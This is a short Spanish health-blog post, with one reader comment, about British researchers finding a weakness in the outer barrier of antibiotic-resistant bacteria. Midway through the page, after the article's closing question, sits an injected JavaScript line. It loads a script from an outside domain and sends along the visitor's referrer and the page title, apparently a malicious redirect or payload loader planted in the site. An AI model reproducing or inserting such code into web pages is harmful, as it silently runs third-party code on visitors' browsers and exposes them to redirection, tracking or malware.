Salud y belleza » Enfermedades, Medicina, Salud

Descubren la debilidad de las bacterias más resistentes

1 Comentario

Cada año el problema de las resistencias de las bacterias a los antibióticos se vuelve mucho más grave y se ha convertido en un problema de salud pública mundial. Pero los días de las superbacterias resistentes a todos los antibióticos están llegando a su fin gracias a un equipo de investigadores de la Universidad East Anglia, en Reino unido, que ha dado con alguna debilidad en la barrera defensiva de las bacterias más resistentes.

resistencia-antibióticos

Este es el primer punto para la creación de nuevos fármacos que puedan actuar más eficazmente contra estas bacterias. Se trata de un descubrimiento muy oportuno teniendo en cuenta que la resistencia a los antibióticos se estaba convirtiendo ya en un problema de gran calado, ya que algunas infecciones comunes estaban volviendo a ser mortales.

bacterias-resistentes

Hasta ahora las bacterias resistentes tenían una membrana externa que hacías las veces de barrera defensiva contra los ataques del sistema inmunológico y de los antibióticos. Pero estos investigadores han logrado descubrir cómo desactivarla para que esas bacterias mueran. En realidad no actúan contra la barrera, sino contra el acceso de las bacterias hacia los bloques que la construyen, por lo que se impide el paso y finalmente mueren.

¿Qué opinas de la investigación sobre las bacterias resistentes?

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • anne said:

    Si seguimos tomando tantos medicamentos para cualquier pequeño dolor al final nuestro cuerpo lo asimila y dejan de hacer efectos los medicamentos… por lo que creo que al final seremos más débiles frente a nuevas enfermedades.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.